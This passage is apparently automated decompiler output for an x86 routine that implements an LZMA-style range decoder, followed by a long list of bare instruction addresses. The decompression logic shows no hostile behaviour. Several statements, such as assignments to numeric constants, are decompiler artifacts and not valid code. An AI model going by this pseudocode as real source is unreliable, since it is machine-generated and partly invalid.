                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t365 = __ebp - 0x70;
                                                												 *_t365 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t365;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												goto L111;
                                                											case 0x11:
                                                												goto L69;
                                                											case 0x12:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													__eax =  *(__ebp - 0x58);
                                                													 *(__ebp - 0x84) = 0x13;
                                                													__esi =  *(__ebp - 0x58) + 2;
                                                													while(1) {
                                                														L132:
                                                														 *(_t613 - 0x54) = _t606;
                                                														goto L133;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												__eflags = __eax;
                                                												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                												goto L130;
                                                											case 0x13:
                                                												__eflags =  *(__ebp - 0x40);
                                                												if( *(__ebp - 0x40) != 0) {
                                                													_t469 = __ebp - 0x58;
                                                													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                													__eflags =  *_t469;
                                                													 *(__ebp - 0x30) = 0x10;
                                                													 *(__ebp - 0x40) = 8;
                                                													L144:
                                                													 *(__ebp - 0x7c) = 0x14;
                                                													goto L145;
                                                												}
                                                												__eax =  *(__ebp - 0x4c);
                                                												__ecx =  *(__ebp - 0x58);
                                                												__eax =  *(__ebp - 0x4c) << 4;
                                                												 *(__ebp - 0x30) = 8;
                                                												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                												L130:
                                                												 *(__ebp - 0x58) = __eax;
                                                												 *(__ebp - 0x40) = 3;
                                                												goto L144;
                                                											case 0x14:
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                												__eax =  *(__ebp - 0x80);
                                                												 *(_t613 - 0x88) = _t533;
                                                												goto L1;
                                                											case 0x15:
                                                												__eax = 0;
                                                												__eflags =  *(__ebp - 0x38) - 7;
                                                												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                												__al = __al & 0x000000fd;
                                                												__eax = (__eflags >= 0) - 1 + 0xb;
                                                												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                												goto L120;
                                                											case 0x16:
                                                												__eax =  *(__ebp - 0x30);
                                                												__eflags = __eax - 4;
                                                												if(__eax >= 4) {
                                                													_push(3);
                                                													_pop(__eax);
                                                												}
                                                												__ecx =  *(__ebp - 4);
                                                												 *(__ebp - 0x40) = 6;
                                                												__eax = __eax << 7;
                                                												 *(__ebp - 0x7c) = 0x19;
                                                												 *(__ebp - 0x58) = __eax;
                                                												goto L145;
                                                											case 0x17:
                                                												L145:
                                                												__eax =  *(__ebp - 0x40);
                                                												 *(__ebp - 0x50) = 1;
                                                												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                												goto L149;
                                                											case 0x18:
                                                												L146:
                                                												__eflags =  *(__ebp - 0x6c);
                                                												if( *(__ebp - 0x6c) == 0) {
                                                													 *(__ebp - 0x88) = 0x18;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x70);
                                                												__eax =  *(__ebp - 0xc);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												_t484 = __ebp - 0x70;
                                                												 *_t484 =  *(__ebp - 0x70) + 1;
                                                												__eflags =  *_t484;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                												L148:
                                                												_t487 = __ebp - 0x48;
                                                												 *_t487 =  *(__ebp - 0x48) - 1;
                                                												__eflags =  *_t487;
                                                												L149:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__ecx =  *(__ebp - 0x40);
                                                													__ebx =  *(__ebp - 0x50);
                                                													0 = 1;
                                                													__eax = 1 << __cl;
                                                													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                													__eax =  *(__ebp - 0x7c);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													while(1) {
                                                														 *(_t613 - 0x88) = _t533;
                                                														goto L1;
                                                													}
                                                												}
                                                												__eax =  *(__ebp - 0x50);
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                												__eax =  *(__ebp - 0x58);
                                                												__esi = __edx + __eax;
                                                												 *(__ebp - 0x54) = __esi;
                                                												__ax =  *__esi;
                                                												__edi = __ax & 0x0000ffff;
                                                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                												__eflags =  *(__ebp - 0xc) - __ecx;
                                                												if( *(__ebp - 0xc) >= __ecx) {
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                													__cx = __ax;
                                                													__cx = __ax >> 5;
                                                													__eax = __eax - __ecx;
                                                													__edx = __edx + 1;
                                                													__eflags = __edx;
                                                													 *__esi = __ax;
                                                													 *(__ebp - 0x50) = __edx;
                                                												} else {
                                                													 *(__ebp - 0x10) = __ecx;
                                                													0x800 = 0x800 - __edi;
                                                													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                													 *__esi = __cx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													goto L148;
                                                												} else {
                                                													goto L146;
                                                												}
                                                											case 0x19:
                                                												__eflags = __ebx - 4;
                                                												if(__ebx < 4) {
                                                													 *(__ebp - 0x2c) = __ebx;
                                                													L119:
                                                													_t393 = __ebp - 0x2c;
                                                													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                													__eflags =  *_t393;
                                                													L120:
                                                													__eax =  *(__ebp - 0x2c);
                                                													__eflags = __eax;
                                                													if(__eax == 0) {
                                                														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                														goto L170;
                                                													}
                                                													__eflags = __eax -  *(__ebp - 0x60);
                                                													if(__eax >  *(__ebp - 0x60)) {
                                                														goto L171;
                                                													}
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                													__eax =  *(__ebp - 0x30);
                                                													_t400 = __ebp - 0x60;
                                                													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                													__eflags =  *_t400;
                                                													goto L123;
                                                												}
                                                												__ecx = __ebx;
                                                												__eax = __ebx;
                                                												__ecx = __ebx >> 1;
                                                												__eax = __ebx & 0x00000001;
                                                												__ecx = (__ebx >> 1) - 1;
                                                												__al = __al | 0x00000002;
                                                												__eax = (__ebx & 0x00000001) << __cl;
                                                												__eflags = __ebx - 0xe;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												if(__ebx >= 0xe) {
                                                													__ebx = 0;
                                                													 *(__ebp - 0x48) = __ecx;
                                                													L102:
                                                													__eflags =  *(__ebp - 0x48);
                                                													if( *(__ebp - 0x48) <= 0) {
                                                														__eax = __eax + __ebx;
                                                														 *(__ebp - 0x40) = 4;
                                                														 *(__ebp - 0x2c) = __eax;
                                                														__eax =  *(__ebp - 4);
                                                														__eax =  *(__ebp - 4) + 0x644;
                                                														__eflags = __eax;
                                                														L108:
                                                														__ebx = 0;
                                                														 *(__ebp - 0x58) = __eax;
                                                														 *(__ebp - 0x50) = 1;
                                                														 *(__ebp - 0x44) = 0;
                                                														 *(__ebp - 0x48) = 0;
                                                														L112:
                                                														__eax =  *(__ebp - 0x40);
                                                														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                															_t391 = __ebp - 0x2c;
                                                															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                															__eflags =  *_t391;
                                                															goto L119;
                                                														}
                                                														__eax =  *(__ebp - 0x50);
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                														__eax =  *(__ebp - 0x58);
                                                														__esi = __edi + __eax;
                                                														 *(__ebp - 0x54) = __esi;
                                                														__ax =  *__esi;
                                                														__ecx = __ax & 0x0000ffff;
                                                														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                														__eflags =  *(__ebp - 0xc) - __edx;
                                                														if( *(__ebp - 0xc) >= __edx) {
                                                															__ecx = 0;
                                                															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                															__ecx = 1;
                                                															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                															__ebx = 1;
                                                															__ecx =  *(__ebp - 0x48);
                                                															__ebx = 1 << __cl;
                                                															__ecx = 1 << __cl;
                                                															__ebx =  *(__ebp - 0x44);
                                                															__ebx =  *(__ebp - 0x44) | __ecx;
                                                															__cx = __ax;
                                                															__cx = __ax >> 5;
                                                															__eax = __eax - __ecx;
                                                															__edi = __edi + 1;
                                                															__eflags = __edi;
                                                															 *(__ebp - 0x44) = __ebx;
                                                															 *__esi = __ax;
                                                															 *(__ebp - 0x50) = __edi;
                                                														} else {
                                                															 *(__ebp - 0x10) = __edx;
                                                															0x800 = 0x800 - __ecx;
                                                															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                															 *__esi = __dx;
                                                														}
                                                														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                														if( *(__ebp - 0x10) >= 0x1000000) {
                                                															L111:
                                                															_t368 = __ebp - 0x48;
                                                															 *_t368 =  *(__ebp - 0x48) + 1;
                                                															__eflags =  *_t368;
                                                															goto L112;
                                                														} else {
                                                															goto L109;
                                                														}
                                                													}
                                                													__ecx =  *(__ebp - 0xc);
                                                													__ebx = __ebx + __ebx;
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													 *(__ebp - 0x44) = __ebx;
                                                													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                														__ecx =  *(__ebp - 0x10);
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                														__ebx = __ebx | 0x00000001;
                                                														__eflags = __ebx;
                                                														 *(__ebp - 0x44) = __ebx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L101:
                                                														_t338 = __ebp - 0x48;
                                                														 *_t338 =  *(__ebp - 0x48) - 1;
                                                														__eflags =  *_t338;
                                                														goto L102;
                                                													} else {
                                                														goto L99;
                                                													}
                                                												}
                                                												__edx =  *(__ebp - 4);
                                                												__eax = __eax - __ebx;
                                                												 *(__ebp - 0x40) = __ecx;
                                                												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                												goto L108;
                                                											case 0x1a:
                                                												L56:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1a;
                                                													goto L170;
                                                												}
                                                												__ecx =  *(__ebp - 0x68);
                                                												__al =  *(__ebp - 0x5c);
                                                												__edx =  *(__ebp - 8);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *( *(__ebp - 0x68)) = __al;
                                                												__ecx =  *(__ebp - 0x14);
                                                												 *(__ecx +  *(__ebp - 8)) = __al;
                                                												__eax = __ecx + 1;
                                                												__edx = 0;
                                                												_t192 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t192;
                                                												goto L80;
                                                											case 0x1b:
                                                												L76:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													 *(__ebp - 0x88) = 0x1b;
                                                													goto L170;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t275 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t275;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												_t284 = __ebp - 0x64;
                                                												 *_t284 =  *(__ebp - 0x64) - 1;
                                                												__eflags =  *_t284;
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												L80:
                                                												 *(__ebp - 0x14) = __edx;
                                                												goto L81;
                                                											case 0x1c:
                                                												while(1) {
                                                													L123:
                                                													__eflags =  *(__ebp - 0x64);
                                                													if( *(__ebp - 0x64) == 0) {
                                                														break;
                                                													}
                                                													__eax =  *(__ebp - 0x14);
                                                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                													__eflags = __eax -  *(__ebp - 0x74);
                                                													if(__eax >=  *(__ebp - 0x74)) {
                                                														__eax = __eax +  *(__ebp - 0x74);
                                                														__eflags = __eax;
                                                													}
                                                													__edx =  *(__ebp - 8);
                                                													__cl =  *(__eax + __edx);
                                                													__eax =  *(__ebp - 0x14);
                                                													 *(__ebp - 0x5c) = __cl;
                                                													 *(__eax + __edx) = __cl;
                                                													__eax = __eax + 1;
                                                													__edx = 0;
                                                													_t414 = __eax %  *(__ebp - 0x74);
                                                													__eax = __eax /  *(__ebp - 0x74);
                                                													__edx = _t414;
                                                													__eax =  *(__ebp - 0x68);
                                                													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                													__eflags =  *(__ebp - 0x30);
                                                													 *( *(__ebp - 0x68)) = __cl;
                                                													 *(__ebp - 0x14) = _t414;
                                                													if( *(__ebp - 0x30) > 0) {
                                                														continue;
                                                													} else {
                                                														L81:
                                                														 *(__ebp - 0x88) = 2;
                                                														goto L1;
                                                													}
                                                												}
                                                												 *(__ebp - 0x88) = 0x1c;
                                                												goto L170;
                                                										}
                                                									}
                                                									L171:
                                                									_t535 = _t534 | 0xffffffff;
                                                									goto L172;
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L1;
                                                				}
                                                			}













                                                0x00000000
                                                0x00406fbb
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fcc
                                                0x00406fd6
                                                0x00000000
                                                0x00406fc1
                                                0x00406fc1
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00406ef5
                                                0x00406ef8
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x0040726d
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00407484
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x0040749c
                                                0x004074a0
                                                0x004074a0
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x004072e6
                                                0x004072e6
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f2e
                                                0x00406f31
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f0d
                                                0x00406f10
                                                0x00406f13
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x00406f26
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
                                                0x00000000
                                                0x00000000
                                                0x0040701c
                                                0x0040701e
                                                0x00407025
                                                0x00407026
                                                0x00407028
                                                0x0040702b
                                                0x00000000
                                                0x00000000
                                                0x00407033
                                                0x00407036
                                                0x00407039
                                                0x0040703b
                                                0x0040703d
                                                0x0040703d
                                                0x0040703e
                                                0x00407041
                                                0x00407048
                                                0x0040704b
                                                0x00407059
                                                0x00000000
                                                0x00000000
                                                0x0040732f
                                                0x0040732f
                                                0x00407332
                                                0x00407339
                                                0x00000000
                                                0x00000000
                                                0x0040733e
                                                0x0040733e
                                                0x00407342
                                                0x0040747a
                                                0x00000000
                                                0x0040747a
                                                0x00407348
                                                0x0040734b
                                                0x0040734e
                                                0x00407352
                                                0x00407355
                                                0x0040735b
                                                0x0040735d
                                                0x0040735d
                                                0x0040735d
                                                0x00407360
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407363
                                                0x00407366
                                                0x00407366
                                                0x0040736a
                                                0x004073ca
                                                0x004073cd
                                                0x004073d2
                                                0x004073d3
                                                0x004073d5
                                                0x004073d7
                                                0x004073da
                                                0x004072e6
                                                0x004072e6
                                                0x00000000
                                                0x004072ec
                                                0x004072e6
                                                0x0040736c
                                                0x00407372
                                                0x00407375
                                                0x00407378
                                                0x0040737b
                                                0x0040737e
                                                0x00407381
                                                0x00407384
                                                0x00407387
                                                0x0040738a
                                                0x0040738d
                                                0x004073a6
                                                0x004073a9
                                                0x004073ac
